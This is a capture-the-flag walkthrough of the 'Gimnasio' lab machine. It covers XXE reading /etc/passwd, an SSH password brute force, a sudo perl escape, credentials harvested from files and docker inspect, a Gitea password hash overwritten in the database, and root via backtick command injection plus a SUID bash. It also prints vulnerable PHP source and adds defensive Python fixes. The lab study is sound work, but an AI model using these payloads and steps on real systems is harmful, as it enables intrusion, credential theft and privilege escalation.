TheHackersLabs-Gimnasio-Walkthrough
城南花已开

Information gathering

Service discovery

```bash
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.206 08:00:27:ab:97:30 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.078 seconds (123.20 hosts/sec). 4 responded
export ip=192.168.60.206
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.206:22
Open 192.168.60.206:80
Open 192.168.60.206:3000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 12:29 CST
Initiating ARP Ping Scan at 12:29
Scanning 192.168.60.206 [1 port]
Completed ARP Ping Scan at 12:29, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:29
Completed Parallel DNS resolution of 1 host. at 12:29, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:29
Scanning 192.168.60.206 [3 ports]
Discovered open port 80/tcp on 192.168.60.206
Discovered open port 22/tcp on 192.168.60.206
Discovered open port 3000/tcp on 192.168.60.206
Completed SYN Stealth Scan at 12:29, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.206
Host is up, received arp-response (0.0010s latency).
Scanned at 2025-02-25 12:29:27 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 63
MAC Address: 08:00:27:AB:97:30 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
```

Edit hosts and add the domain name

```bash
sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.206 neogym.thl
```

Scan for directories

```bash
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.206
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 17809]
/contact.php (Status: 200) [Size: 5951]
/images (Status: 301) [Size: 317] [--> http://192.168.60.206/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.60.206/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.60.206/js/]
/why.php (Status: 200) [Size: 7315]
/process.php (Status: 200) [Size: 45]
/views (Status: 301) [Size: 316] [--> http://192.168.60.206/views/]
/trainer.php (Status: 200) [Size: 6831]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

Visit each of them in turn

XXE vulnerability

Clicking submit on contact.php sends a POST request to process.php

process.php is vulnerable to XXE: there is no direct echo of the entity, but the out-of-band hit on my web server shows that the external entity really was resolved


```bash
tail -f /var/log/nginx/access.log
192.168.60.206 - - [25/Feb/2025:13:47:18 +0800] "GET /rev.php HTTP/1.1" 200 9288 "-" "-"
```

Later I noticed that the name field is reflected in the response, so I tried reading the source code through a PHP filter


```php
<?php
// Raw request body is parsed as XML with no restrictions on the DTD.
$xmlData = file_get_contents('php://input');

if ($_SERVER['REQUEST_METHOD'] === 'POST' && $xmlData !== null && $xmlData !== '') {
    libxml_use_internal_errors(true);

    $dom = new DOMDocument();

    // resolveExternals together with LIBXML_NOENT below makes libxml fetch and
    // substitute external entities declared in the DTD: this is the XXE sink.
    $dom->resolveExternals = true;
    $dom->substituteEntities = false;

    $loaded = @$dom->loadXML($xmlData, LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_DTDATTR);

    if ($loaded === false) {
        $errors = libxml_get_errors();
        foreach ($errors as $error) {
            file_put_contents('php://stderr', "Error XML: {$error->message}\n");
        }

        echo "Hubo un error al procesar la solicitud.";
    } else {
        $xml = simplexml_import_dom($dom);

        $name = (string)$xml->name;
        $email = (string)$xml->email;
        $phone = (string)$xml->phone;
        $message = (string)$xml->message;

        // $name is echoed back unescaped, so whatever an entity expanded to
        // inside <name> ends up in the response.
        echo "¡Gracias por ponerte en contacto con nosotros, {$name}! En breve nos estaremos comunicando contigo. ¡Saludos desde NeoGym!";
    }
} else {
    echo "Ocurrió un error al procesar la solicitud.";
}
?>
```


The source simply accepts XML data from an HTTP POST; there is nothing else useful in it

I tried reading /etc/passwd

```bash
root:x:0:0:root:/root:/bin/bash
kyle:x:1000:1000:kyle,,,:/home/kyle:/bin/bash
postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
james:x:1001:1001:James,,,:/home/james:/bin/bash
steve:x:1002:1002:Steve,,,:/home/steve:/bin/bash
```
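The root cause in process.php is that external entities are fetched and substituted (resolveExternals plus LIBXML_DTDLOAD | LIBXML_NOENT); the fix in PHP is to drop those and pass LIBXML_NONET. As an added example (not the box's code), here is the same contact-form handler written in Python so the policy is explicit: refuse any DOCTYPE or custom entity reference before parsing, since the form never needs one. The root element name `contact` is an assumption.

```python
"""Safe handling of the NeoGym-style contact XML (added example)."""
import re
import xml.etree.ElementTree as ET

# A DOCTYPE is the only place entities can be declared; a contact form has
# no business sending one, so its presence alone is a rejection reason.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# Any entity reference other than the five predefined ones or a numeric
# character reference must have come from a DTD.
ENTITY_REF_RE = re.compile(
    rb"&(?!(?:amp|lt|gt|quot|apos|#[0-9]+|#x[0-9a-fA-F]+);)[^;\s]*;"
)
FIELDS = ("name", "email", "phone", "message")


def check_body(body: bytes):
    """Return a rejection reason for a suspicious body, or None if it is clean.

    Worth logging on its own: a DOCTYPE in a contact-form POST is a strong
    XXE indicator regardless of whether the parser would have expanded it.
    """
    if DOCTYPE_RE.search(body):
        return "DOCTYPE not allowed"
    if ENTITY_REF_RE.search(body):
        return "custom entity reference not allowed"
    return None


def parse_contact(body: bytes) -> dict:
    """Extract the four form fields; raise ValueError on anything unexpected.

    xml.etree never resolves external entities, and with no DOCTYPE present an
    undefined entity is a parse error, so the checks above and the parser agree.
    """
    reason = check_body(body)
    if reason is not None:
        raise ValueError(reason)
    try:
        root = ET.fromstring(body)  # assumed root element: <contact>
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    return {f: (root.findtext(f) or "").strip() for f in FIELDS}
```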

Brute-forcing yields a login: james:manchesterunited

```bash
❯ hydra -L name -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-25 17:14:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43033197 login tries (l:3/p:14344399), ~2689575 tries per task
[DATA] attacking ssh://192.168.60.206:22/
[STATUS] 219.00 tries/min, 219 tries in 00:01h, 43032979 to do in 3274:58h, 15 active
[STATUS] 213.67 tries/min, 641 tries in 00:03h, 43032557 to do in 3356:41h, 15 active
[STATUS] 239.14 tries/min, 1674 tries in 00:07h, 43031524 to do in 2999:01h, 15 active
[22][ssh] host: 192.168.60.206 login: james password: manchesterunited
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
```

User privilege escalation

Connect over SSH

```bash
❯ ssh james@$ip
The authenticity of host '192.168.60.206 (192.168.60.206)' can't be established.
ED25519 key fingerprint is SHA256:zKXP6w9NN/kxInvTLyVBsXbPdh2JBQZuQm4JoesE2+4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.206' (ED25519) to the list of known hosts.
james@192.168.60.206's password:
Linux neogym 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 14:45:19 2025 from 192.168.18.16
james@neogym:~$ ls -al
total 40
drwx------ 5 james james 4096 Feb 24 12:51 .
drwxr-xr-x 5 root root 4096 Feb 23 10:51 ..
lrwxrwxrwx 1 root root 9 Feb 23 11:01 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Jan 31 21:13 .bash_logout
-rw-r--r-- 1 james james 3526 Jan 31 21:13 .bashrc
drwx------ 4 james james 4096 Jan 31 22:24 .cache
drwxr-xr-x 3 james james 4096 Jan 31 22:24 .config
-rw-r--r-- 1 james james 5290 Jan 31 21:13 .face
lrwxrwxrwx 1 james james 5 Jan 31 21:13 .face.icon -> .face
drwx------ 4 james james 4096 Jan 31 22:25 .local
-rw-r--r-- 1 james james 807 Jan 31 21:13 .profile
james@neogym:~$ id
uid=1001(james) gid=1001(james) groups=1001(james),100(users)
james@neogym:~$ sudo -l
Matching Defaults entries for james on neogym:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User james may run the following commands on neogym:
(kyle) NOPASSWD: /usr/bin/perl
```

The sudo rule for perl can be used to escalate to the kyle user

kyle has sudo rights as well; first grab user.txt

```bash
james@neogym:~$ sudo -u kyle /usr/bin/perl -e 'exec "/bin/bash";'
kyle@neogym:/home/james$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),100(users)
kyle@neogym:~$ cat user.txt
9551bfd5501e3cb80b264056b0f66986
kyle@neogym:/home/james$ sudo -l
Matching Defaults entries for kyle on neogym:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User kyle may run the following commands on neogym:
(ALL) NOPASSWD: /usr/bin/python3 /opt/scripts/systemcheck.py *
```

The script itself cannot be read, though

I tried running it

Most of it turns out to be wrappers around docker commands

And after each run a mail notification arrives

```bash
kyle@neogym:/opt$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py -a


Ayuda:

container-inspect: Inspecciona un cierto contenedor de Docker
container-images: Lista las imagenes
container-ps: Lista los contenedores que estan en ejecución
full-check: Realiza un chequeo del sistema

Ejemplo de uso:

/usr/bin/python3 /opt/scripts/system-checkup.py container-ps
/usr/bin/python3 /opt/scripts/system-checkup.py container-images
/usr/bin/python3 /opt/scripts/system-checkup.py container-inspect <container_name>
/usr/bin/python3 /opt/scripts/system-checkup.py full-check

kyle@neogym:/opt$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
23f46d29b6e5 gitea/gitea:latest "/usr/bin/entrypoint…" 2 days ago Up About an hour 22/tcp, 0.0.0.0:3000->3000/tcp, :::3000->3000/tcp gitea
349800ace4ef mysql:8 "docker-entrypoint.s…" 2 days ago Up About an hour 3306/tcp, 33060/tcp gitea-db
You have mail in /var/mail/kyle
kyle@neogym:/opt$ cat /var/mail/kyle
From [email protected] Tue Feb 25 06:33:15 2025
Return-path: <[email protected]>
Envelope-to: [email protected]
Delivery-date: Tue, 25 Feb 2025 06:33:15 -0300
Received: from kyle by neogym.thl.neogym.thl with local (Exim 4.96)
(envelope-from <[email protected]>)
id 1tmrJT-0000pk-2m
for [email protected];
Tue, 25 Feb 2025 06:33:15 -0300
To: [email protected]
Auto-Submitted: auto-generated
Subject: *** SECURITY information for neogym.thl.neogym.thl ***
From: kyle <[email protected]>
Message-Id: <[email protected]>
Date: Tue, 25 Feb 2025 06:33:15 -0300

neogym.thl.neogym.thl : Feb 25 06:33:15 : kyle : a password is required ; TTY=pts/1 ; PWD=/opt ; USER=root ; COMMAND=/usr/bin/python3 /opt/scripts/systemcheck.py


kyle@neogym:/opt$
```

I also found a credential in steve's home directory

But switching to that user fails with a wrong password, and trying it on the Gitea login got nowhere either

```bash
kyle@neogym:/home/steve$ cat .bash_history
ls -l
ls -la
exit
ls -l
vim credenciales.txt
exit
kyle@neogym:/home/steve$ cat credenciales.txt
steve:Sup3rP4$sw0rd123!
```

A second round of enumeration turned up another subdomain, admin.neogym.thl

Its database configuration file is readable

```bash
kyle@neogym://var/www/html/admin$ ls -la
total 100
drwxr-xr-x 7 root root 4096 Feb 24 10:04 .
drwxr-xr-x 4 root root 4096 Jan 31 20:50 ..
-rw-r--r-- 1 root root 43 Jan 24 23:01 config.php
drwxr-xr-x 2 root root 4096 Jan 24 21:47 css
-rw-r--r-- 1 root root 310 Jan 31 20:48 db.php
drwxr-xr-x 2 root root 4096 Jan 31 20:47 img
-rw-r--r-- 1 root root 29690 Jan 25 15:59 index.php
drwxr-xr-x 3 root root 4096 Jan 24 21:38 js
-rw-r--r-- 1 root root 1091 Dec 14 22:51 LICENSE
-rw-r--r-- 1 root root 3617 Jan 25 12:36 login.php
-rw-r--r-- 1 root root 85 Dec 15 11:37 logout.php
-rw-r--r-- 1 root root 4141 Dec 14 22:51 README.md
-rw-r--r-- 1 root root 2766 Feb 24 09:51 save_client.php
drwxr-xr-x 2 root root 4096 Jan 24 21:38 uploads
-rw-r--r-- 1 root root 2342 Dec 15 11:43 utils.php
-rw-r--r-- 1 root root 1227 Jan 25 15:19 validate.php
drwxr-xr-x 8 root root 4096 Jan 24 21:38 vendor
kyle@neogym://var/www/html/admin$ cat db.php
<?php
$db_host = '127.0.0.1';
$db_port = 5432;
$db_user = 'postgres';
$db_password = 'uDq&9h&Qpc81urFS1F';
$db_name = 'neogym';

$conn = pg_connect("host=$db_host port=$db_port dbname=$db_name user=$db_user password=$db_password");

if (!$conn) {
echo "Error de conexión a la base de datos.";
}
```

Edit hosts again and add the new domain

Log in with the credentials above


This isn't much use though: you can add partners, but it errors out

At this point I felt I had gone completely in the wrong direction

and was only getting further along it


Root privilege escalation

Change of direction: there is Docker on the box, after all

And the script can show detailed information about a container

The Config section reveals the MySQL login credentials

```bash
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect 23f46d29b6e5
[
{
"Id": "23f46d29b6e5de202e53171d7aadae36cbb890a75b68e42c7d36117f409be85d",
"Created": "2025-02-23T00:59:10.661365463Z",
"Path": "/usr/bin/entrypoint",
"Args": [
"/usr/bin/s6-svscan",
"/etc/s6"

"Config": {
"Hostname": "23f46d29b6e5",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"ExposedPorts": {
"22/tcp": {},
"3000/tcp": {}
},
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"DB_NAME=gitea",
"DB_USER=gitea",
"DB_PASSWD=rIS2i8FdX89jHqkyWy4",
"USER_UID=1000",
"USER_GID=1000",
"DB_TYPE=mysql",
"DB_HOST=gitea-db:3306",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"USER=git",
"GITEA_CUSTOM=/data/gitea"
}
]
```

Scan the services on the Docker network with fscan

MySQL turns out to be listening on 172.18.0.3:3306

```bash
kyle@neogym:/tmp$ ./fscan -h 172.18.0.0/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.18.0.0-172.18.0.255
[*] 已生成IP范围: 172.18.0.0 - 172.18.0.255
[*] 已解析CIDR 172.18.0.0/24 -> IP范围 172.18.0.0-172.18.0.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.18.0.1 存活 (ICMP)
[+] 目标 172.18.0.2 存活 (ICMP)
[+] 目标 172.18.0.3 存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.18.0.1:80
[+] 端口开放 172.18.0.2:22
[+] 端口开放 172.18.0.1:22
[+] 端口开放 172.18.0.3:3306
[+] 端口开放 172.18.0.2:3000
[+] 端口开放 172.18.0.1:3000
[+] 存活端口数量: 6
[*] 开始漏洞扫描...
[*] 网站标题 http://172.18.0.1 状态码:200 长度:17809 标题:Neogym
[*] 网站标题 http://172.18.0.1:3000 状态码:200 长度:13589 标题:Gitea: Git with a cup of tea
[*] 网站标题 http://172.18.0.2:3000 状态码:200 长度:13589 标题:Gitea: Git with a cup of tea
[+] 发现指纹 目标: http://172.18.0.1:3000 指纹: [Gitea简易Git服务]
[+] 发现指纹 目标: http://172.18.0.2:3000 指纹: [Gitea简易Git服务]
[!] 扫描错误 172.18.0.3:3306 - Error 1524 (HY000): Plugin 'mysql_native_password' is not loaded
[!] 扫描错误 172.18.0.2:22 - ssh: handshake failed: EOF
[!] 扫描错误 172.18.0.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 6/6
[*] 扫描结束,耗时: 13.066505449s
```

Connect to the MySQL instance inside Docker

```bash
kyle@neogym:/tmp$ mysql -h 172.18.0.3 -ugitea -prIS2i8FdX89jHqkyWy4
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 250881
Server version: 8.4.4 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| gitea |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.047 sec)

MySQL [(none)]> use gitea
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

sDatabase changed
MySQL [gitea]> show tables;
+---------------------------+
| Tables_in_gitea |
+---------------------------+
| access |
| access_token |
| action |
| action_artifact |
| action_run |
| action_run_index |
| action_run_job |
| action_runner |
| action_runner_token |
| action_schedule |
| action_schedule_spec |
| action_task |
| action_task_output |
| action_task_step |
| action_tasks_version |
| action_variable |
| app_state |
| attachment |
| auth_token |
| badge |
| branch |
| collaboration |
| comment |
| commit_status |
| commit_status_index |
| commit_status_summary |
| dbfs_data |
| dbfs_meta |
| deploy_key |
| email_address |
| email_hash |
| external_login_user |
| follow |
| gpg_key |
| gpg_key_import |
| hook_task |
| issue |
| issue_assignees |
| issue_content_history |
| issue_dependency |
| issue_index |
| issue_label |
| issue_user |
| issue_watch |
| label |
| language_stat |
| lfs_lock |
| lfs_meta_object |
| login_source |
| milestone |
| mirror |
| notice |
| notification |
| oauth2_application |
| oauth2_authorization_code |
| oauth2_grant |
| org_user |
| package |
| package_blob |
| package_blob_upload |
| package_cleanup_rule |
| package_file |
| package_property |
| package_version |
| project |
| project_board |
| project_issue |
| protected_branch |
| protected_tag |
| public_key |
| pull_auto_merge |
| pull_request |
| push_mirror |
| reaction |
| release |
| renamed_branch |
| repo_archiver |
| repo_indexer_status |
| repo_license |
| repo_redirect |
| repo_topic |
| repo_transfer |
| repo_unit |
| repository |
| review |
| review_state |
| secret |
| session |
| star |
| stopwatch |
| system_setting |
| task |
| team |
| team_invite |
| team_repo |
| team_unit |
| team_user |
| topic |
| tracked_time |
| two_factor |
| upload |
| user |
| user_badge |
| user_blocking |
| user_open_id |
| user_redirect |
| user_setting |
| version |
| watch |
| webauthn_credential |
| webhook |
+---------------------------+
111 rows in set (0.003 sec)

MySQL [gitea]> select * from user;
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
| id | lower_name | name | full_name | email | keep_email_private | email_notifications_preference | passwd | passwd_hash_algo | must_change_password | login_type | login_source | login_name | type | location | website | rands | salt | language | description | created_unix | updated_unix | last_login_unix | last_repo_visibility | max_repo_creation | is_active | is_admin | is_restricted | allow_git_hook | allow_import_local | allow_create_organization | prohibit_login | avatar | avatar_email | use_custom_avatar | num_followers | num_following | num_stars | num_repos | num_teams | num_members | visibility | repo_admin_change_team_access | diff_view_style | theme | keep_activity_private |
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
| 1 | administrador | administrador | | [email protected] | 0 | enabled | 93725bcf4547d4a48bbf1db5388d84384d0c2d5d2d300abcf88f27bda8ca43343bdbdb907e821c7773b3850fe13e2603da3c | pbkdf2$50000$50 | 0 | 0 | 0 | | 0 | | | fab0c0813109116d4d6dd1f8e9b3a5d6 | f439c46d381ae6790b9e6ce0a44101d5 | en-US | | 1740272753 | 1740410915 | 1740410915 | 1 | -1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | fed541306f75ad60abcc37c7a1bf427d | [email protected] | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 | 0 | | gitea-auto | 0 |
+----+---------------+---------------+-----------+---------------------------+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------+------------------+----------------------+------------+--------------+------------+------+----------+---------+----------------------------------+----------------------------------+----------+-------------+--------------+--------------+-----------------+----------------------+-------------------+-----------+----------+---------------+----------------+--------------------+---------------------------+----------------+----------------------------------+---------------------------+-------------------+---------------+---------------+-----------+-----------+-----------+-------------+------------+-------------------------------+-----------------+------------+-----------------------+
1 row in set (0.002 sec)

MySQL [gitea]>
```

This gives the password hash for administrador

I threw it at an online cracking service, with no result

Since it can't be cracked, we can simply replace the hash with one we choose ourselves

Change the passwd and passwd_hash_algo fields

Generate a hash online

Bcrypt Encrypt - Bcrypt Hash Generator - Online - Browserling Web Developer Tools


```bash
MySQL [gitea]> update user set passwd="$2a$10$cSeNaAidmhzMwlVoW56wyeIeD78VDDx0Nq/zcE91a.mC86w4q0DxC" where id=1;
Query OK, 1 row affected (0.018 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [gitea]> update user set passwd_hash_algo="bcrypt" where id=1;
Query OK, 1 row affected (0.008 sec)
Rows matched: 1 Changed: 1 Warnings: 0
```

After logging in there is a repository, and the script in it is the very one that sudo runs

Now the source can be read


In the source, the second argument of container_inspect allows command execution


The argument is concatenated into something like docker inspect $(id), and bash runs the command inside $( ) before docker ever sees it

But in this shell environment commands produce no output

So set the SUID bit on bash instead

```bash
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect '`id`'
[]
Error: No such object: uid=0(root)
Error: No such object: gid=0(root)
Error: No such object: groups=0(root)
kyle@neogym:~$ sudo /usr/bin/python3 /opt/scripts/systemcheck.py container-inspect '`bash`'
root@neogym:/home/kyle# cat /root/root.txt
root@neogym:/home/kyle# ls -al /root/
root@neogym:/home/kyle# chmod +s /bin/bash
root@neogym:/home/kyle# exit
exit
unknown shorthand flag: '>' in ->
See 'docker inspect --help'.
kyle@neogym:~$ bash -p
bash-5.2# cat /root/root.txt
89db0121a107d46b719f52eac2f03567
```
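The bug class behind container-inspect is worth seeing side by side with its fix. The block below is an added example and a hypothetical reconstruction, not the box's systemcheck.py: `inspect_unsafe` pastes the user-supplied argument into a command string that /bin/sh expands, which is exactly why `$(id)` or backticks run as root under the `(ALL) NOPASSWD: ... systemcheck.py *` rule; `inspect_safe` validates the reference against Docker's own container-name rule and passes it as a single argv element with no shell involved. The `tool` parameter is only there so the demo can run with `echo` instead of `docker`.

```python
"""Command injection in a sudo-run docker wrapper and its fix (added example)."""
import re
import subprocess

# Docker's restricted name pattern for containers: [a-zA-Z0-9][a-zA-Z0-9_.-]+.
# Hex container IDs match it too. A leading '-' is impossible, so a name can
# never be turned into a docker flag either.
CONTAINER_REF = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]+$")


def inspect_unsafe(tool: str, ref: str) -> str:
    """The vulnerable shape: one string, shell=True.

    The shell performs command substitution on `ref` before `tool` runs, and
    because sudo grants the whole script with a trailing '*', everything in
    that substitution executes as root.
    """
    cmd = f"{tool} inspect {ref}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def inspect_safe(tool: str, ref: str, validate: bool = True) -> str:
    """The fixed shape: validate, then pass `ref` as its own argv element.

    With an argv list there is no shell, so `$(...)`, backticks and ';' are
    ordinary bytes in the argument. Validation is the second layer: it keeps
    garbage out of the logs and rejects anything that is not a container
    name or ID before docker is even invoked.
    """
    if validate and not CONTAINER_REF.fullmatch(ref):
        raise ValueError(f"invalid container reference: {ref!r}")
    return subprocess.run([tool, "inspect", ref], capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Harmless stand-in for the page's '`id`' argument: echo instead of docker.
    probe = "$(echo injected)"
    print("unsafe:", inspect_unsafe("echo", probe).strip())      # inspect injected
    print("argv only:", inspect_safe("echo", probe, validate=False).strip())
    try:
        inspect_safe("echo", probe)
    except ValueError as exc:
        print("validated:", exc)
```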
